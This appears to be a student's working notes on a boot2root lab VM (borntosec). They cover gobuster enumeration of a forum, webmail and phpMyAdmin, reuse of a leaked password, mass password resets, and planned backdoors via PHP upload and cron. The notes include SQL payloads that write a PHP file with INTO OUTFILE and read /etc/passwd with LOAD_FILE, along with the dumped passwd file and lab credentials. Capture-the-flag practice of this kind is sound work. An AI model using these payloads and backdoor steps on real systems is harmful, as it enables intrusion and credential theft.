IDEAS

https://localhost:13443/forum/index.php?id=6 has been edited, find first version?
find vulnerabilities for mylittleforum 2.3.4

LINKS

https://www.cvedetails.com/vulnerability-list/vendor_id-10908/product_id-19531/Mylittleforum-My-Little-Forum.html#:~:text=CVE%2D2015%2D1475,php%20or%20(b)%20forum_entry.
https://www.exploit-db.com/exploits/40676
https://stackoverflowteams.com/c/42network/questions/664
https://www.cvedetails.com/version/1251384/Mylittleforum-My-Little-Forum-2.3.4.html
https://www.cvedetails.com/version/583080/Squirrelmail-Squirrelmail-1.4.22.html

VERSIONS

MyLittleForum 2.3.4
SquirrelMail 1.4.22
phpMyAdmin 3.4.10.1deb1
MySQL client version: 5.5.44
Apache/2.2.22 (Ubuntu)
PHP extension: mysqli
Server version: 5.5.44-0ubuntu0.12.04.1 (according to phpMyAdmin)

TODO

Note how to find mylittleforum version
Create boot2root account on forum
Create boot2root account on webmail
Change admin password on forum
Delete .htaccess?
Use Very interesting !!!! mail
https://localhost:13443/forum/index.php?mode=js_defaults&t=1707434027&user_type=2 (delete_backup_confirm)

wtf is that?
https://localhost:13443/forum/modules/bad-behavior/index.html
https://localhost:13443/forum/modules/bad-behavior/bad-behavior/banned.inc.php

https://localhost:13443/forum/index.php?mode=admin&action=edit_page PHP backdoor here?
Add backdoor to cron
Try uploading php files instead of profile pictures for backdoor

Add a user to /etc/passwd using SQL

PASSWORDS

forum | lmezard | !q\]Ej?*5K5cy*AJ
forum | everyone after hack | !q\]Ej?*5K5cy*AJ

admin@borntosec.net
webmail | laurie@borntosec.net | !q\]Ej?*5K5cy*AJ
qudevide@borntosec.net
thor@borntosec.net
wandre@borntosec.net
zaz@borntosec.net

phpmyadmin | root | Fg-'kKXBj87E:aJ$
phpmyadmin | debian-sys-maint after hack | Fg-'kKXBj87E:aJ$ (doesn't work somehow)
phpmyadmin | phpmyadmin after hack | Fg-'kKXBj87E:aJ$

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
whoopsie:x:103:107::/nonexistent:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ft_root:x:1000:1000:ft_root,,,:/home/ft_root:/bin/bash
mysql:x:106:115:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/bin/false
lmezard:x:1001:1001:laurie,,,:/home/lmezard:/bin/bash
laurie@borntosec.net:x:1002:1002:Laurie,,,:/home/laurie@borntosec.net:/bin/bash
laurie:x:1003:1003:,,,:/home/laurie:/bin/bash
thor:x:1004:1004:,,,:/home/thor:/bin/bash
zaz:x:1005:1005:,,,:/home/zaz:/bin/bash
dovecot:x:108:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:109:65534:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:110:118::/var/spool/postfix:/bin/false

STEPS

Setup port forwarding for common ports (20 -> 13020, 21 -> 13021, 22 -> 13022, 443 -> 13443)

go install github.com/OJ/gobuster/v3@latest
gcl git@github.com:danielmiessler/SecLists.git ~/sgoinfre/seclists
gcl git@github.com:My-Little-Forum/mylittleforum.git ~/sgoinfre/mylittleforum

~/go/bin/gobuster dir -u https://localhost:13443 -w ~/sgoinfre/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -k -x php,html,js
Found: /forum /webmail /phpmyadmin

~/go/bin/gobuster dir -u https://localhost:13443/forum -w ~/sgoinfre/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -k -x php,html,js
Found: /images /.html /themes /modules /index /index.php /includes /update /js /lang /config /backup

~/go/bin/gobuster dir -u https://localhost:13443/webmail -w ~/sgoinfre/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -k -x php,html,js
Found: /.html /index.php /images /help /themes /plugins /src /include /config /class /functions /po /locale

view-source:https://localhost:13443/forum/ shows my little forum 2.3.4

Read https://localhost:13443/forum/index.php?id=6
Someone tried to connect with username !q\]Ej?*5K5cy*AJ, lmezard logged in right after
This is her password for both the forum and webmail

We connect to webmail and find a mail with subject "DB Access" with the root credentials
We connect to phpmyadmin.
We change all passwords for forum to be the same as lmezard
We change all passwords for phpmyadmin to be the same as root

Visit https://localhost:13443/forum/index.php?mode=admin&action=backup as admin and create complete backup

SELECT '<?php phpinfo(); ?>' INTO OUTFILE '/tmp/mycustomphpinfo.php'
SELECT CONVERT(LOAD_FILE('/etc/passwd') USING utf8);
Print view (with full texts)
SELECT CONVERT(LOAD_FILE('/usr/share/doc/apache2/README.Debian.gz') USING utf8); (https://askubuntu.com/a/684030)
